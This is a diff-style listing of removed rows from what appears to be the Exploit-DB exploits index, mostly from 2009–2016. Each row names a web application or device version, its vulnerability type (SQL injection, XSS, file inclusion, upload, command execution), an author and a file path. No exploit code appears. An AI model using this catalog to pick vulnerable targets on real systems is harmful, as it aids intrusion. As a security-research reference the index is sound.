-34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps, -34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps, -34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps, -34014,exploits/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System - 'user.php' SQL Injection",2010-05-08,"Easy Laster",php,webapps, -34015,exploits/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps, -34016,exploits/php/webapps/34016.txt,"Snipe Gallery 3.1 - 'gallery.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps, -34017,exploits/php/webapps/34017.txt,"Snipe Gallery 3.1 - 'image.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps, -34021,exploits/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' SQL Injection",2010-05-19,"Kernel Security Group",php,webapps, -34022,exploits/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps, -34023,exploits/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Multiple Cross-Site Scripting / SQL Injections",2010-05-20,"High-Tech Bridge SA",php,webapps, -34024,exploits/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps, -34030,exploits/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps, -34025,exploits/php/webapps/34025.txt,"C99Shell (Web Shell) - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps, -34029,exploits/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injections",2010-05-21,epixoip,php,webapps, -34031,exploits/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps, -34032,exploits/php/webapps/34032.txt,"NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",php,webapps, -34034,exploits/asp/webapps/34034.txt,"cyberhost - 'default.asp' SQL Injection",2010-05-22,redst0rm,asp,webapps, -34035,exploits/php/webapps/34035.sjs,"OpenForum 2.2 b005 - 'saveAsAttachment()' Method Arbitrary File Creation",2010-05-23,"John Leitch",php,webapps, -34062,exploits/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80 -34038,exploits/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps, -34189,exploits/php/webapps/34189.txt,"Sphider Search Engine 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 -34040,exploits/php/webapps/34040.txt,"RazorCMS 1.0 - '/admin/index.php' HTML Injection",2010-05-24,"High-Tech Bridge SA",php,webapps, -34041,exploits/php/webapps/34041.txt,"Getsimple CMS 2.01 - 'components.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps, -34042,exploits/php/webapps/34042.txt,"Ruubikcms 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps, -34043,exploits/php/webapps/34043.txt,"360 Web Manager 3.0 - 'webpages-form-led-edit.php' SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps, -34044,exploits/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script - 'index.php' Cross-Site Scripting",2010-05-26,indoushka,php,webapps, -34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",php,webapps, -34052,exploits/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection",2010-05-28,"Christopher Schramm",php,webapps, -34053,exploits/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections",2010-05-28,"High-Tech Bridge SA",php,webapps, -34054,exploits/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps, -34055,exploits/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps, -40716,exploits/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps, -34057,exploits/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps, -34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps, -34068,exploits/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps, -34070,exploits/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps, -34071,exploits/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' SQL Injection",2010-06-02,LynX,php,webapps, -34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps, -34073,exploits/php/webapps/34073.py,"TCExam 10.1.7 - '/admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps, -34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,webapps, -34086,exploits/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 -34087,exploits/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 -34153,exploits/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps, -34138,exploits/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps, -34077,exploits/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps, -34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,php,webapps, -34079,exploits/php/webapps/34079.txt,"Sniggabo CMS 2.21 - 'search.php' Cross-Site Scripting",2010-01-06,Sora,php,webapps, -34080,exploits/cgi/webapps/34080.txt,"MoinMoin 1.x - 'PageEditor.py' Cross-Site Scripting",2010-06-03,anonymous,cgi,webapps, -34081,exploits/php/webapps/34081.txt,"KubeLabs PHPDug 2.0 - 'upcoming.php' Cross-Site Scripting",2010-01-06,indoushka,php,webapps, -34082,exploits/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 - 'display.php' Cross-Site Scripting",2010-01-02,kaMtiEz,php,webapps, -34083,exploits/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Cross-Site Scripting",2009-12-30,emgent,php,webapps, -34084,exploits/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps, -34085,exploits/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps, -40718,exploits/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps, -34089,exploits/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 -34091,exploits/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps, -34092,exploits/jsp/webapps/34092.txt,"JForum 2.1.8 - 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps, -34095,exploits/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps, -34096,exploits/php/webapps/34096.txt,"CuteSITE CMS 1.x - '/manage/add_user.php?user_id' SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps, -34097,exploits/php/webapps/34097.txt,"CuteSITE CMS 1.x - '/manage/main.php?fld_path' Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps, -34155,exploits/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps, -34157,exploits/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps, -34116,exploits/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - 'showcasesearch.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,php,webapps, -34117,exploits/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - 'showcase2search.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,php,webapps, -34118,exploits/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps, -34119,exploits/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - '/addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps, -34120,exploits/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - '/register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps, -34121,exploits/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps, -34341,exploits/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps, -34342,exploits/php/webapps/34342.txt,"Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps, -34100,exploits/php/webapps/34100.txt,"Omeka 2.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-07-17,LiquidWorm,php,webapps,80 -40296,exploits/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,php,webapps, -34140,exploits/php/webapps/34140.txt,"AneCMS 1.x - '/modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps, -34113,exploits/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps, -34105,exploits/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 -34106,exploits/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps, -34107,exploits/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps, -34108,exploits/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps, -34109,exploits/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps, -34110,exploits/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps, -34111,exploits/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps, -34339,exploits/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps, -34124,exploits/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps, -34130,exploits/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 -34127,exploits/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps, -34128,exploits/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 -34161,exploits/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 -34149,exploits/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps, -34159,exploits/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps, -34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps, -34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps, -34166,exploits/php/webapps/34166.txt,"KubeSupport - 'lang' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps, -34168,exploits/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 -34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps, -34170,exploits/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps, -34173,exploits/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",php,webapps, -34175,exploits/php/webapps/34175.txt,"SaffaTunes CMS - 'news.php' Multiple SQL Injections",2010-06-21,"Th3 RDX",php,webapps, -34176,exploits/php/webapps/34176.html,"osCMax 2.0 - 'articles.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps, -34177,exploits/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS - 'copy_folder.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps, -34179,exploits/jsp/webapps/34179.txt,"IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting",2010-06-21,IBM,jsp,webapps, -34180,exploits/asp/webapps/34180.txt,"webConductor - 'default.asp' SQL Injection",2010-06-22,"Th3 RDX",asp,webapps, -34181,exploits/php/webapps/34181.txt,"SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities",2010-06-22,cp77fk4r,php,webapps, -34183,exploits/php/webapps/34183.txt,"Jamroom 4.0.2/4.1.x - 'forum.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps, -34185,exploits/php/webapps/34185.txt,"PreProject Multi-Vendor Shopping Malls - 'products.php' SQL Injection",2010-06-23,CoBRa_21,php,webapps, -34187,exploits/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery",2014-07-28,"Seth Art",hardware,webapps,80 -34190,exploits/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple Cross-Site Request Forgery / HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 -34194,exploits/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script - Multiple SQL Injections",2010-06-24,"High-Tech Bridge SA",asp,webapps, -34195,exploits/php/webapps/34195.txt,"WordPress Plugin Cimy Counter 0.9.4 - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps, -34196,exploits/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps, -34197,exploits/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps, -34198,exploits/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps, -34204,exploits/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 -34205,exploits/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution",2014-07-30,LiquidWorm,php,webapps,80 -34206,exploits/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 -34207,exploits/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' SQL Injection",2010-06-28,Tr0y-x,php,webapps, -34209,exploits/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' SQL Injection",2010-06-28,S.W.T,php,webapps, -34210,exploits/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps, -34211,exploits/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps, -34212,exploits/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps, -34213,exploits/php/webapps/34213.txt,"PHP Bible Search - 'bible.php?chapter' SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps, -34214,exploits/php/webapps/34214.txt,"PHP Bible Search - 'bible.php?chapter' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps, -34215,exploits/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps, -34216,exploits/php/webapps/34216.txt,"eBay Clone Script 2010 - 'showcategory.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",php,webapps, -34217,exploits/php/webapps/34217.txt,"Clix'N'Cash Clone 2010 - 'index.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",php,webapps, -34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,php,webapps, -34219,exploits/php/webapps/34219.txt,"CANDID - '/image/view.php?image_id' SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps, -34220,exploits/php/webapps/34220.txt,"CANDID - '/image/view.php?image_id' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps, -34221,exploits/asp/webapps/34221.txt,"Iatek PortalApp 3.3/4.0 - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",asp,webapps, -34222,exploits/php/webapps/34222.html,"Grafik CMS - '/admin.php' SQL Injection / Cross-Site Scripting",2010-06-29,"High-Tech Bridge SA",php,webapps, -34223,exploits/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 - 'index.pl' Remote Command Execution",2010-06-29,"Marshall Whittaker",cgi,webapps, -34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,multiple,webapps, -34225,exploits/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection / HTML Injection",2010-06-29,"Lucas Apa",php,webapps, -34226,exploits/php/webapps/34226.txt,"System CMS Contentia - 'news.php' SQL Injection",2010-06-30,GlaDiaT0R,php,webapps, -34229,exploits/php/webapps/34229.txt,"ArcademSX 2.904 - 'cat' Cross-Site Scripting",2010-06-29,"Th3 RDX",php,webapps, -34231,exploits/php/webapps/34231.txt,"LiveZilla 3.1.8.3 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-30,MaXe,php,webapps, -34232,exploits/php/webapps/34232.txt,"DPScms - 'q' SQL Injection / Cross-Site Scripting",2010-07-01,Ariko-Security,php,webapps, -34234,exploits/php/webapps/34234.txt,"Flatnux 2010-06.09 - 'find' Cross-Site Scripting",2010-07-01,ITSecTeam,php,webapps, -34235,exploits/php/webapps/34235.txt,"Wiki Web Help 0.2.7 - Cross-Site Scripting / HTML Injection",2010-07-01,"John Leitch",php,webapps, -34236,exploits/php/webapps/34236.txt,"ReCMS - 'users_lang' Directory Traversal",2010-07-01,Locu,php,webapps, -34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",multiple,webapps, -34238,exploits/php/webapps/34238.txt,"Sphider Search Engine - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 -34239,exploits/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 -34240,exploits/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,ios,webapps,8080 -34241,exploits/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Privilege Escalation",2014-08-02,mra,linux,webapps,8080 -34336,exploits/php/webapps/34336.html,"WordPress Plugin Disqus 2.7.5 - Cross-Site Request Forgery (Admin Persistent) / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",php,webapps,80 -34337,exploits/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps, -34338,exploits/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps, -34243,exploits/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 -34245,exploits/php/webapps/34245.txt,"ArticleFR 11.06.2014 - 'data.php' Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 -34246,exploits/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -34250,exploits/php/webapps/34250.txt,"Joomla! Component Canteen 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps, -34252,exploits/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps, -34253,exploits/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps, -34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps, -34255,exploits/php/webapps/34255.html,"cPanel 11.25 - Cross-Site Request Forgery",2010-07-03,G0D-F4Th3r,php,webapps, -34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps, -34257,exploits/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (2)",2010-07-06,"Ivan Sanchez",php,webapps, -34258,exploits/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps, -34259,exploits/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps, -34260,exploits/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps, -34263,exploits/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal",2014-08-04,Vulnerability-Lab,ios,webapps,8080 -34264,exploits/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 -34265,exploits/php/webapps/34265.txt,"Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps, -34266,exploits/php/webapps/34266.txt,"RunCMS 2.1 - 'check.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps, -34268,exploits/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps, -34273,exploits/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 -34275,exploits/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 -34277,exploits/php/webapps/34277.txt,"Feng Office - Persistent Cross-Site Scripting",2014-08-06,"Juan Sacco",php,webapps, -34527,exploits/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner - DLL Loading Arbitrary Code Execution",2010-08-25,Kolor,windows,webapps, -34280,exploits/php/webapps/34280.txt,"phpFaber CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps, -34282,exploits/php/webapps/34282.txt,"Real Estate Manager 1.0.1 - 'index.php' Cross-Site Scripting",2010-07-09,bi0,php,webapps, -34283,exploits/php/webapps/34283.txt,"Model Agency Manager - 'search_process.php' Cross-Site Scripting",2009-12-13,bi0,php,webapps, -34284,exploits/php/webapps/34284.txt,"osCSS 1.2.2 - 'page' Cross-Site Scripting",2010-07-08,"High-Tech Bridge SA",php,webapps, -34285,exploits/php/webapps/34285.txt,"Articlems 2.0 - 'c[]' Cross-Site Scripting",2010-12-13,Packetdeath,php,webapps, -34286,exploits/php/webapps/34286.txt,"SimpNews 2.47.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps, -34287,exploits/php/webapps/34287.txt,"Yappa 3.1.2 - 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps, -34288,exploits/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections",2009-12-22,"Hadi Kiamarsi",php,webapps, -34289,exploits/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,php,webapps, -34290,exploits/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps, -34291,exploits/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps, -34292,exploits/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps, -34293,exploits/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",java,webapps, -34294,exploits/php/webapps/34294.txt,"WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps, -34295,exploits/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps, -34296,exploits/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps, -34298,exploits/php/webapps/34298.py,"CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps, -34299,exploits/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion",2010-07-11,"John Leitch",php,webapps, -34300,exploits/php/webapps/34300.py,"CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps, -34302,exploits/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps, -34303,exploits/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - Local File Inclusion",2014-08-09,Vulnerability-Lab,ios,webapps,8000 -34305,exploits/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection",2014-08-09,Vulnerability-Lab,ios,webapps,8080 -34308,exploits/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection",2014-08-09,Breaking.Technology,php,webapps,80 -34315,exploits/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding - 'searchform.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps, -34317,exploits/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,php,webapps, -34318,exploits/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,php,webapps, -34319,exploits/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps, -34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps, 